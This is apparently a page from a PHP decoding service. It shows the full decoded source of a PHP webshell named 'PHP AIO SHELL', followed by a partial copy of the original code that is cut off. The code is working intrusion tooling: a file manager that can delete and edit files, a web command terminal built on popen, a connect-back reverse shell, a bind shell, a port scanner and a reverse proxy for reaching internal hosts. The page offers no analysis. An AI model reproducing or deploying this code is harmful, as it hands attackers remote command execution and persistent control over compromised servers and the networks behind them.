Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php session_start(); error_reporting(E_ALL); function read_file($file_name) { $fp = f..
Decoded Output download
<?php
session_start();
error_reporting(E_ALL);
function read_file($file_name)
{
$fp = fopen($file_name, "r");
if ($fp == false) {
echo "open $file_name failed.
";
return -1;
}
while (($buf = fgets($fp, 1024)) != false ) {
echo $buf;
}
fclose($fp);
return 0;
}
function copy_file($src_file, $dst_file)
{
$src_fp = fopen($src_file, "r");
if ($src_fp == false) {
echo "open $src_file failed.
";
return -1;
}
$dst_fp = fopen($dst_file, "w+");
if ($dst_fp == false) {
fclose($src_fp);
return -1;
}
while (($buf = fgets($src_fp, 1024)) != false) {
if (fwrite($dst_fp, $buf, strlen($buf)) == false) {
echo "fwrite failed.
";
fclose($src_fp);
fclose($dst_fp);
return -1;
}
}
fclose($src_fp);
fclose($dst_fp);
return 0;
}
function copy_file_binary($src_file, $dst_file)
{
if (file_exists($src_file) == false) {
echo "file $src_file not exist.
";
return -1;
}
if (copy($src_file, $dst_file) == false) {
echo "copy $src to $dst_file failed.
";
return -1;
}
echo "copy $src_file to $dst_file ok.
";
return 0;
}
function delete_file($file_name)
{
if (file_exists($file_name) == false) {
echo "file $file_name not exist.";
return -1;
}
if (unlink($file_name) == false) {
echo "delete $file_name failed.";
return -1;
}
echo "delete $file_name ok.
";
return 0;
}
function edit_file($file_path)
{
$file_name = basename($file_path);
if (empty($_POST['newcontent'])) {
echo '<form action="" method="post">';
$fp=@fopen($file_name, "r");
$data=@fread($fp, filesize($file_name));
echo '<textarea name="newcontent" cols="80" rows="20" >';
echo $data;
@fclose($fp);
echo '</textarea>
<input type="submit" value="Edit"/>
</form>';
}
else {
$fp=@fopen($file_name, "w+");
$result=@fwrite($fp, $_POST['newcontent']);
@fclose($fp);
if ($result == false) {
echo "edit failed.";
}
else {
echo "edit ok.";
}
}
}
function rename_file($old_file_name, $new_file_name)
{
if (file_exists($old_file_name) == false) {
echo "file $old_file_name not exist.
";
return -1;
}
if (rename($old_file_name, $new_file_name) == false) {
echo "rename $old_file_name to $new_file_name failed.
";
return -1;
}
echo "rename $old_file_name to $new_file_name ok.
";
return 0;
}
function get_human_size($bytes)
{
$type=array("Bytes", "KB", "MB", "GB", "TB");
$idx=0;
while ($bytes >= 1024) {
$bytes /= 1024;
$idx++;
}
return (intval($bytes)." ".$type[$idx]);
}
function get_file_perms($file_name)
{
return (substr(sprintf('%o', fileperms($file_name)), -4));
}
function get_human_file_perms($file_name)
{
$perms = fileperms($file_name);
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function get_file_owner($file_name)
{
$uid=fileowner($file_name);
$user_info = posix_getpwuid($uid);
return $user_info['name'];
}
function read_dir($dir_path)
{
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.
";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
echo "$sub_path
";
}
}
closedir($dp);
return 0;
}
function read_dirs($dir_path)
{
echo '
<table>
<tr class="banner">
<td width="400" >Filename</td>
<td width="400" >Last modified</td>
<td width="400" >Size</td>
<td width="400" >Chmod/Perms</td>
<td width="400" >Action</td>
</tr>';
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.
";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
$last_modify_time=date("Y/m/d H:i:s", fileatime($file_name));
$file_size=filesize($file_name);
$file_size_string=get_human_size($file_size);
$file_perms=get_file_perms($file_name);
$file_perms_string=get_human_file_perms($file_name);
$file_owner=get_file_owner($file_name);
echo '<tr class="directory">
<td width="400" ><a href='.$file_name.'>'.$file_name.'</a></td>
<td width="400" >'.$last_modify_time.'</td>
<td width="400" >'.$file_size_string.'</td>
<td width="400" >'.$file_perms.' / '.$file_perms_string.' / '.$file_owner.'</td>
<td width="400" ><a href="webshell.php?delete='.$file_name.'"'.'>Delete </a>
<a href="webshell.php?edit='.$file_name.'"'.'>Edit </a>
<a href="webshell.php?download='.$file_name.'"'.'>Download </a>
<a href="webshell.php?rename='.$file_name.'"'.'>Rename </a>
</td>
</tr>';
}
}
echo '</table>';
closedir($dp);
return 0;
}
function aio_directory()
{
$curr_path=getcwd();
return read_dirs($curr_path);
}
function search_file_by_name($dir_path, $target_file)
{
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.
";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
if (is_dir($sub_path)) {
search_file_by_name($sub_path, $target_file);
}
if (!strcmp($file_name, $target_file)) {
echo "found $target_file.
";
closedir($dp);
return 0;
}
}
echo "not found $target_file.
";
closedir($dp);
}
return -1;
}
/**
* show file attribute with cetern flag.
*
* @dir_path - directroy to search.
* @attr_flag - 0 readable.
* - 1 writeable.
* - 2 executable.
*/
function show_attr_file($dir_path, $attr_flag)
{
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.
";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
if (is_dir($sub_path)) {
show_attr_file($sub_path, $attr_flag);
}
if ($attr_flag == 0) {
if (is_readable($file_name))
echo "$sub_path
";
}
else if ($attr_flag == 1) {
if (is_writable($file_name))
echo "$sub_path
";
}
else if ($attr_flag == 2) {
if (is_executable($file_name))
echo "$sub_path
";
}
else {
echo "wrong attribute flag.
";
break;
}
}
closedir($dp);
}
return 0;
}
function create_dir($dir_path)
{
if (file_exists($dir_path))
return -1;
if (mkdir($dir_path, 0700) == false) {
echo "create $dir_path failed.
";
return -1;
}
echo "create $dir_path ok.
";
return 0;
}
function destroy_dir($dir_path)
{
if (file_exists($dir_path) == false)
return -1;
if (rmdir($dir_path) == false) {
echo "delete $dir_path failed.
";
return -1;
}
echo "delete $dir_path ok.
";
return 0;
}
function destroy_dirs($dir_path)
{
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.
";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
if (is_dir($sub_path)) {
destroy_dirs($sub_path);
}
else
delete_file($sub_path);
}
closedir($dp);
destroy_dir($dir_path);
return 0;
}
return 0;
}
function linux_id()
{
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
echo "uid=".$uid."(".$user_info['name'].") ";
echo "gid=".$user_info['gid']."(".$user_info['name'].") ";
echo "dir=".$user_info['dir']." ";
echo "shell=".$user_info['shell']."
";
}
function linux_uname()
{
$uname = posix_uname();
echo $uname['sysname']." ".$uname['nodename']." ".$uname['release']." ";
echo $uname['version']." ".$uname['machine'];
}
function get_proc_name($file_name)
{
$fp = fopen($file_name, "r");
if ($fp == false) {
echo "open $file_name failed.
";
return -1;
}
while (($buf = fgets($fp, 1024)) != false ) {
if (strstr($buf, "Name:") != NULL) {
sscanf($buf, "%s %s", $tmp, $name);
fclose($fp);
return $name;
}
}
fclose($fp);
return 0;
}
function get_proc_cmd($file_name)
{
$fp = fopen($file_name, "r");
if ($fp == false) {
echo "open $file_name failed.
";
return -1;
}
$cmd = fgets($fp, 1024);
fclose($fp);
return $cmd;
}
function linux_ps()
{
if (($dp = opendir("/proc")) == false) {
echo "open /proc failed.
";
return -1;
}
echo "open /proc ok.
";
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
if (ctype_digit($file_name) == false)
continue;
$dir_path = "/proc/$file_name/status";
$proc_name = get_proc_name($dir_path);
$dir_path = "/proc/$file_name/cmdline";
$proc_cmd = get_proc_cmd($dir_path);
echo $file_name." ".$proc_name." ".$proc_cmd."
";
}
closedir($dp);
return 0;
}
function tcp_connect($host, $port)
{
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket == false) {
echo "create socket error.
";
return -1;
}
if (@socket_connect($socket, $host, $port) == false) {
socket_close($socket);
return -1;
}
return $socket;
}
function tcp_connect_timeout($host, $port, $timeout)
{
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket == false) {
echo "create socket error.
";
return -1;
}
if (socket_set_nonblock($socket) == false) {
echo "set nonblock error.
";
socket_close($socket);
return -1;
}
$time = time();
while (!@socket_connect($socket, $host, $port)) {
$err = socket_last_error($socket);
if ($err == 115 || $err == 114) {
if ((time() - $time) >= $timeout) {
socket_close($socket);
echo "socket timeout.
";
return -1;
}
sleep(1);
continue;
}
socket_close($socket);
return -1;
}
echo "connect to $host:$port ok.
";
return $socket;
}
function run_proxy_client($remote_host1, $remote_port1, $remote_host2, $remote_port2)
{
$socket1 = tcp_connect($remote_host1, $remote_port1);
if ($socket1 == -1) {
echo "connect to $remote_host1:$remote_port1 failed.
";
return -1;
}
echo "connect to $remote_host1:$remote_port1 ok.
";
$socket2 = tcp_connect($remote_host2, $remote_port2);
if ($socket2 == -1) {
echo "connect to $remote_host2:$remote_port2 failed.
";
socket_close($socket1);
return -1;
}
echo "connect to $remote_host2:$remote_port2 ok.
";
run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2);
return 0;
}
function web_proxy_client()
{
echo '<html><head><style>
h3.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}
form
{
text-align:center;
}
input[type=text]
{
width:300px;
color:#384850;
background-color:#ffffff;
}
input[type=submit]
{
width:80px;
color:#384850;
background-color:#ffffff;
}
</head></style>
<body>
<h3 class="banner">Linux reverse proxy</h3>
<form action="" method="post">
<b>intranet host</b>
<input type="text" name="intranet_host" />
<b>intranet port</b>
<input type="text" name="intranet_port" /><br />
<b>public host</b>
<input type="text" name="public_host" />
<b>public port</b>
<input type="text" name="public_port" /><br /><br />
<input type="submit" value="Run" />
</form>
</body>
</html>';
if (empty($_POST['intranet_host']) || empty($_POST['intranet_port']) ||
empty($_POST['public_host']) || empty($_POST['public_port']))
return -1;
run_proxy_client($_POST['intranet_host'], $_POST['intranet_port'],
$_POST['public_host'], $_POST['public_port']);
}
function run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2)
{
while (true) {
$read_sockets = array($socket1, $socket2);
$write_sockets = NULL;
$except_sockets = NULL;
if (socket_select($read_sockets, $write_sockets, $except, 0) == -1) {
echo "socket_select error ".socket_strerror(socket_last_error())."
";
break;
}
if (in_array($socket2, $read_sockets)) {
//echo "got data from $remote_host2.
";
$bytes2 = socket_recv($socket2, $buf2, 1024, MSG_DONTWAIT);
if ($bytes2 == false) {
echo "socket_recv ".socket_strerror(socket_last_error($socket2))."
";
break;
}
//echo "got bytes $bytes2.
";
if ($bytes2 == 0) {
echo "recv no data from $remote_host2.
";
break;
}
$ret2 = socket_send($socket1, $buf2, $bytes2, MSG_EOR);
if ($ret2 == false) {
echo "socket_send ".socket_strerror(socket_last_error($socket1))."
";
break;
}
if ($ret2 != $bytes2) {
echo "send data failed.
";
break;
}
//echo "write $ret2 bytes ok.
";
}
if (in_array($socket1, $read_sockets)) {
//echo "got data from $remote_host1.
";
$bytes1 = socket_recv($socket1, $buf1, 1024, MSG_DONTWAIT);
if ($bytes1 == false) {
echo "socket_recv ".socket_strerror(socket_last_error($socket1))."
";
break;
}
//echo "got bytes $bytes1.
";
if ($bytes1 == 0) {
echo "recv no data from $remote_host1.
";
break;
}
$ret1 = socket_send($socket2, $buf1, $bytes1, MSG_EOR);
if ($ret1 == false) {
echo "socket_send ".socket_strerror(socket_last_error($socket2))."
";
break;
}
if ($ret1 != $bytes1) {
echo "send data failed.
";
break;
}
//echo "write $ret1 bytes ok.
";
}
}
echo "proxy done.
";
socket_close($socket1);
socket_close($socket2);
return 0;
}
function init_proxy_server($local_port)
{
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket == false) {
echo "create socket error.
";
return -1;
}
if (socket_bind($socket, '0', $local_port) == false) {
echo "bind sock error.
";
socket_close($socket);
return -1;
}
if (socket_listen($socket) == false) {
echo "listen sock error.
";
socket_close($socket);
return -1;
}
echo "listen on port $local_port ok.
";
return $socket;
}
function run_proxy_server($local_port1, $local_port2)
{
$socket1 = init_proxy_server($local_port1);
if ($socket1 == -1)
return -1;
while (true) {
if (($newsock1 = socket_accept($socket1)) !== false) {
socket_getpeername($newsock1, $ip1);
echo "got a client form $ip1
";
break;
}
}
$socket2 = init_proxy_server($local_port2);
if ($socket2 == -1)
return -1;
while (true) {
if (($newsock2 = socket_accept($socket2)) !== false) {
socket_getpeername($newsock2, $ip2);
echo "got a client form $ip2
";
break;
}
}
echo "start transmit data ...
";
run_proxy_core($newsock2, $ip2, $newsock1, $ip1);
socket_close($socket2);
socket_close($socket1);
return 0;
}
function tcp_connect_port($host, $port, $timeout)
{
$fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
return $fp;
}
function port_scan_fast($host, $timeout, $banner)
{
$general_ports = array(
'21'=>'FTP',
'22'=>'SSH',
'23'=>'Telnet',
'25'=>'SMTP',
'79'=>'Finger',
'80'=>'HTTP',
'81'=>'HTTP/Proxy',
'110'=>'POP3',
'135'=>'MS Netbios',
'139'=>'MS Netbios',
'143'=>'IMAP',
'162'=>'SNMP',
'389'=>'LDAP',
'443'=>'HTTPS',
'445'=>'MS SMB',
'873'=>'rsync',
'1080'=>'Proxy/HTTP Server',
'1433'=>'MS SQL Server',
'2433'=>'MS SQL Server Hidden',
'1521'=>'Oracle DB Server',
'1522'=>'Oracle DB Server',
'3128'=>'Squid Cache Server',
'3129'=>'Squid Cache Server',
'3306'=>'MySQL Server',
'3307'=>'MySQL Server',
'3500'=>'Squid Cache Server',
'3389'=>'MS Terminal Service',
'5800'=>'VNC Server',
'5900'=>'VNC Server',
'8080'=>'Proxy/HTTP Server',
'10000'=>'Webmin',
'11211'=>'Memcached'
);
echo '<table>';
foreach($general_ports as $port=>$name) {
if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
if (empty($banner) == false) {
$data = fgets($fp, 128);
echo '<tr>
<td>'.$host.'</td>
<td>'.$port.'</td>
<td>'.$name.'</td>
<td>'.$data.'</td>
</tr>';
}
else {
echo '<tr>
<td>'.$host.'</td>
<td>'.$port.'</td>
<td>'.$name.'</td>
</tr>';
}
fclose($fp);
}
}
echo '</table>';
}
function port_scan($host, $src_port, $dst_port, $timeout, $banner)
{
echo '<table>
<tr>
<td>Host</td>
<td>Port</td>
<td>State</td>
</tr>';
for ($port = $src_port; $port <= $dst_port; $port++) {
if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
if (empty($banner) == false) {
$data = fgets($fp, 128);
echo '<tr>
<td>'.$host.'</td>
<td>'.$port.'</td>
<td>'.$data.'</td>
</tr>';
}
else {
echo '<tr>
<td>'.$host.'</td>
<td>'.$port.'</td>
<td>OPEN</td>
</tr>';
}
fclose($fp);
}
}
echo '</table>';
}
function run_portscan()
{
echo '<html>
<head>
<style>
tr.directory
{
font-size:14px;
text-align:left;
height:20px;
border:1px solid #98bf21;
padding:2px 6px 2px 6px;
}
</style>
</head>
<body>
<form action="" method="post">
target host
<input type="text" name="scan_host" value="127.0.0.1" />
timeout
<input type="text" name="scan_timeout" value="5" />
general ports
<input type="checkbox" name="scan_fast" />
banner
<input type="checkbox" name="scan_banner" />
<input type="submit" value="scan" />
</form>
</body>
</html>';
if (empty($_POST['scan_host']))
return -1;
if (isset($_POST['scan_fast'])) {
port_scan_fast($_POST['scan_host'], $_POST['scan_timeout'],
$_POST['scan_banner']);
}
else {
port_scan($_POST['scan_host'], "1", "65535",
$_POST['scan_timeout'],
$_POST['scan_banner']);
}
}
function linux_exec($socket, $cmd)
{
$handle = popen($cmd, "r");
while (($buf = fgets($handle, 1024)) != false) {
$ret = socket_write($socket, $buf, strlen($buf));
if ($ret == false) {
return -1;
}
}
pclose($handle);
return 0;
}
function connect_backdoor($host, $port)
{
$banner = "connect back from phpshell
";
$socket = tcp_connect($host, $port);
if ($socket == -1) {
echo "connect to $host:$port failed.
";
return -1;
}
echo "connect to $host:$port ok.
";
$ret = socket_write($socket, $banner, strlen($banner));
if ($ret == false) {
echo "write data failed.
";
socket_close($socket);
return -1;
}
while (true) {
$buf = socket_read($socket, 1024);
echo $buf;
linux_exec($socket, $buf);
}
}
function bindshell($local_port)
{
$banner = "bindshell from phpshell
";
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket == false) {
echo "create socket error.
";
return -1;
}
if (socket_bind($socket, '0', $local_port) == false) {
echo "bind sock error.
";
socket_close($socket);
return -1;
}
if (socket_listen($socket) == false) {
echo "listen sock error.
";
socket_close($socket);
return -1;
}
echo "listen on port $local_port ok.
";
while (true) {
if (($newsock = socket_accept($socket)) !== false) {
socket_getpeername($newsock, $ip);
echo "got a client form $ip"."<br />";
break;
}
}
$ret = socket_write($newsock, $banner, strlen($banner));
if ($ret == false) {
echo "write data failed.
";
socket_close($newsock);
socket_close($socket);
return -1;
}
while (true) {
$buf = socket_read($newsock, 1024);
echo $buf;
linux_exec($newsock, $buf);
}
socket_close($newsock);
socket_close($socket);
return 0;
}
function run_backdoor()
{
echo '<html><head><style>
h3.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}
form
{
text-align:center;
}
input[type=text]
{
width:300px;
color:#384850;
background-color:#ffffff;
}
input[type=submit]
{
width:80px;
color:#384850;
background-color:#ffffff;
}
</head></style>
<h3 class="banner" >Linux connect backdoor</h3>
<form action="" method="post">
Target host
<input type="text" name="target_host" />
Target port
<input type="text" name="target_port" />
<input type="submit" value="Connect" />
</form>
</br />
<h3 class="banner" >Linux bindshell backdoor</h3>
<form action="" method="post">
Bind port
<input type="text" name="bind_port" />
<input type="submit" value="Bindshell" />
</form>
</html>';
if ($_POST['target_host'] && $_POST['target_port']) {
connect_backdoor($_POST['target_host'], $_POST['target_port']);
}
if ($_POST['bind_port']) {
bindshell($_POST['bind_port']);
}
}
/*
function exec_shell($cmd)
{
$handle = popen($cmd, "r");
while (($buf = fgets($handle, 1024)) != false) {
echo $buf;
}
pclose($handle);
return 0;
}
function run_shell()
{
$host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
echo '<html>
<head>
<style>
input[type=text]
{
width:1130px;
color:#384850;
background-color:#ffffff;
}
textarea
{
width:1130px;
color:#384850;
background-color:#ffffff;
}
</style>
</head>
<body>
<form action="" method="post">
<font color="#384850">'.$user_info['name'].'@'.$host_name.'$</font>
<input style="border:none" color="#384850" type="text" name="shellcmd" />
<input style="border:none" color="#384850" type="submit" value="Execute" /><br /><br />
<textarea name="textarea" cols="150" rows="30" readonly>';
if ($_POST['shellcmd']) {
//echo $user_info['name'].'@'.$host_name.'$';
//echo $_POST['shellcmd'];
exec_shell($_POST['shellcmd']);
echo '</textarea></form></body></html>';
}
}
*/
function run_terminal_shell($cmd)
{
$handle = popen($cmd, "r");
while (($buf = fgets($handle, 1024)) != false) {
$data .= $buf."";
}
pclose($handle);
return $data;
}
function aio_shell()
{
$host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
$curr_path = getcwd();
$prompt=$user_info['name'].'@'.$host_name.':'.$curr_path;
echo '<html>
<head>
<style>
tr.banner
{
font-size: 18px;
font-style:italic;
color:#ffffff;
background-color: #285070;
}
tr.prompt
{
font-size: 14px;
color:#285800;
background-color: #000000;
}
textarea {border: none; margin: 0px; padding: 2px 2px 2px; color: #285800; background-color: #000000;}
input
{
color: #285800; background-color: #000000;
}
</style>
<script type="text/javascript" language="JavaScript">
function init()
{
document.shell.output.scrollTop = document.shell.output.scrollHeight;
}
</script>
</head>
<body onload="init()">
<table align="center" border="0" width="600" cellpadding="0" cellspacing="0">
<tr class="banner">
<td width="10%"><b>TERMINAL</b></td>
<td align="center">'.$prompt.'</td>
</tr>
<form name="shell" action="" method="post">
<tr class="prompt">
<td colspan="2" nowrap>
<textarea name="output" rows="20" cols="90">';
if ($_POST['shellcmd']) {
$cmd_data = $prompt.'$'.$_POST['shellcmd']."
";
$cmd_data .= run_terminal_shell($_POST['shellcmd']);
$_SESSION['output'] .= $cmd_data;
echo $_SESSION['output'];
}
echo '</textarea><br />'.$prompt.'$'.'
<input style="border:none" type="text" name="shellcmd" />
<input style="border:none" type="submit" value="" />
</td>
</tr>
</form>
<tr class="banner">
<td align="center" height="20" colspan="2"> © wzt 2014 http://www.cloud-sec.org</td>
</tr>
</table>
</body>
</html>';
}
function webshell_main()
{
if (isset($_GET['cmd'])) {
if ($_GET['cmd'] == "backdoor") {
run_backdoor();
}
if ($_GET['cmd'] == "shell") {
aio_shell();
}
if ($_GET['cmd'] == "portscan") {
run_portscan();
}
if ($_GET['cmd'] == "proxy") {
web_proxy_client();
}
}
else {
echo '<html>
<body>
<table border="0" cellpadding="10" cellspacing="20">
<tr>
<td><a href="webshell.php?cmd=showdir">show directorys</a></td>
<td><a href="webshell.php?cmd=backdoor">connect backdoor</a></td>
<td><a href="webshell.php?cmd=portscan">port scan</a></td>
<td><a href="webshell.php?cmd=proxy">reverse proxy</a></td>
<td><a href="webshell.php?cmd=shell">cmd shell</a></td>
</tr>
</body>
</html>';
}
}
function aio_main()
{
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
$uid_banner="uid=".$uid."(".$user_info['name'].") ".
"gid=".$user_info['gid']."(".$user_info['name'].") ".
"dir=".$user_info['dir']." ".
"shell=".$user_info['shell'];
$uname = posix_uname();
$uname_banner=$uname['sysname']." ".$uname['nodename']." ".$uname['release']." ".
$uname['version']." ".$uname['machine'];
$server_addr=$_SERVER['SERVER_NAME'];
$server_port= $_SERVER['SERVER_PORT'];
$server_time=date("Y/m/d h:i:s",time());
$phpsoft=$_SERVER['SERVER_SOFTWARE'];
$php_version=PHP_VERSION;
$zend_version=zend_version();
$dis_func=get_cfg_var("disable_functions");
$safemode=@ini_get('safe_mode');
if ($safemode == false)
$safemode="On";
$cwd_path=getcwd();
$total_disk=disk_total_space("/");
$total_disk_gb=intval($total_disk/(1024*1024*1024));
$free_disk=disk_free_space("/");
$free_disk_gb=intval($free_disk/(1024*1024*1024));
echo '<html>
<head>
<style>
body
{
background-color:#FFFFFF;
}
ul.banner
{
list-style-type:none;
margin:0;
padding:0;
text-align:center;
color:#384850;
background-color:gray;
font-size:20px;
font-weight:bold;
}
ul.directory
{
font-size:14px;
text-align:left;
font-weight: bold;
}
li
{
display:inline;
}
a:link
{
color:#384850;
}
a:visited
{
color:#384850;
}
a:hover
{
color:#384850;
}
a:active
{
color:#384850;
}
h2.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}
table.banner
{
font-size:14px;
}
tr.banner
{
font-size:16px;
color:#384850;
background-color:gray;
}
tr.directory
{
font-size:14px;
text-align:left;
height:20px;
border:1px solid #98bf21;
padding:2px 6px 2px 6px;
}
p.banner
{
font-size:14px;
}
</style>
</head>
<body>
<h2 class="banner">PHP AIO SHELL</h2>
<hr />
<table class="banner">
<tr>
<td width="1200" >User: '.$uid_banner.'</td>
<td width="200" align="center" >'.$server_time.'</td>
</tr>
<tr>
<td width="1200" >Uname: '.$uname_banner.'</td>
<td width="200" align="center" >'.$server_addr.":".$server_port.'</td>
</tr>
</table>
<hr />
<p class="banner">Software: '.$phpsoft.' | PHP: '.$php_version.' | ZEND: '.$zend_version.'
| Safemode: '.$safemode.' | disfunc: '.$dis_func.'
</p>
<table class="banner">
<tr>
<td width="200" align="left">Directroy: '.$cwd_path.'</td>
<td width="200" >Disk: total '.$total_disk_gb.'GB free '.$free_disk_gb.'GB </td>
</tr>
</table>
<br />
<ul class="banner">
<li><a href="webshell.php?cmd=dir">[Directorys]</a></li>
<li><a href="webshell.php?cmd=backdoor">[Backdoor]</a></li>
<li><a href="webshell.php?cmd=portscan">[PortScan]</a></li>
<li><a href="webshell.php?cmd=proxy">[Proxy]</a></li>
<li><a href="webshell.php?cmd=shell">[Shell]</a></li>
<li><a href="webshell.php?cmd=crack">[Crack]</a></li>
<li><a href="webshell.php?cmd=mysql">[Mysql]</a></li>
</ul>
<br />
</body>
</html>';
if ($_GET['cmd']) {
if ($_GET['cmd'] == "dir") {
aio_directory();
}
if ($_GET['cmd'] == "backdoor") {
run_backdoor();
}
if ($_GET['cmd'] == "shell") {
aio_shell();
}
if ($_GET['cmd'] == "portscan") {
run_portscan();
}
if ($_GET['cmd'] == "proxy") {
web_proxy_client();
}
}
if ($_GET['delete']) {
delete_file($_GET['delete']);
}
if ($_GET['edit']) {
edit_file($_GET['edit']);
}
}
aio_main();
?>
Did this file decode correctly?
Original Code
<?php
session_start();
error_reporting(E_ALL);
function read_file($file_name)
{
$fp = fopen($file_name, "r");
if ($fp == false) {
echo "open $file_name failed.\n";
return -1;
}
while (($buf = fgets($fp, 1024)) != false ) {
echo $buf;
}
fclose($fp);
return 0;
}
function copy_file($src_file, $dst_file)
{
$src_fp = fopen($src_file, "r");
if ($src_fp == false) {
echo "open $src_file failed.\n";
return -1;
}
$dst_fp = fopen($dst_file, "w+");
if ($dst_fp == false) {
fclose($src_fp);
return -1;
}
while (($buf = fgets($src_fp, 1024)) != false) {
if (fwrite($dst_fp, $buf, strlen($buf)) == false) {
echo "fwrite failed.\n";
fclose($src_fp);
fclose($dst_fp);
return -1;
}
}
fclose($src_fp);
fclose($dst_fp);
return 0;
}
function copy_file_binary($src_file, $dst_file)
{
if (file_exists($src_file) == false) {
echo "file $src_file not exist.\n";
return -1;
}
if (copy($src_file, $dst_file) == false) {
echo "copy $src to $dst_file failed.\n";
return -1;
}
echo "copy $src_file to $dst_file ok.\n";
return 0;
}
function delete_file($file_name)
{
if (file_exists($file_name) == false) {
echo "file $file_name not exist.";
return -1;
}
if (unlink($file_name) == false) {
echo "delete $file_name failed.";
return -1;
}
echo "delete $file_name ok.\n";
return 0;
}
function edit_file($file_path)
{
$file_name = basename($file_path);
if (empty($_POST['newcontent'])) {
echo '<form action="" method="post">';
$fp=@fopen($file_name, "r");
$data=@fread($fp, filesize($file_name));
echo '<textarea name="newcontent" cols="80" rows="20" >';
echo $data;
@fclose($fp);
echo '</textarea>
<input type="submit" value="Edit"/>
</form>';
}
else {
$fp=@fopen($file_name, "w+");
$result=@fwrite($fp, $_POST['newcontent']);
@fclose($fp);
if ($result == false) {
echo "edit failed.";
}
else {
echo "edit ok.";
}
}
}
function rename_file($old_file_name, $new_file_name)
{
if (file_exists($old_file_name) == false) {
echo "file $old_file_name not exist.\n";
return -1;
}
if (rename($old_file_name, $new_file_name) == false) {
echo "rename $old_file_name to $new_file_name failed.\n";
return -1;
}
echo "rename $old_file_name to $new_file_name ok.\n";
return 0;
}
function get_human_size($bytes)
{
$type=array("Bytes", "KB", "MB", "GB", "TB");
$idx=0;
while ($bytes >= 1024) {
$bytes /= 1024;
$idx++;
}
return (intval($bytes)." ".$type[$idx]);
}
function get_file_perms($file_name)
{
return (substr(sprintf('%o', fileperms($file_name)), -4));
}
function get_human_file_perms($file_name)
{
$perms = fileperms($file_name);
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function get_file_owner($file_name)
{
$uid=fileowner($file_name);
$user_info = posix_getpwuid($uid);
return $user_info['name'];
}
function read_dir($dir_path)
{
if (is_dir($dir_path)) {
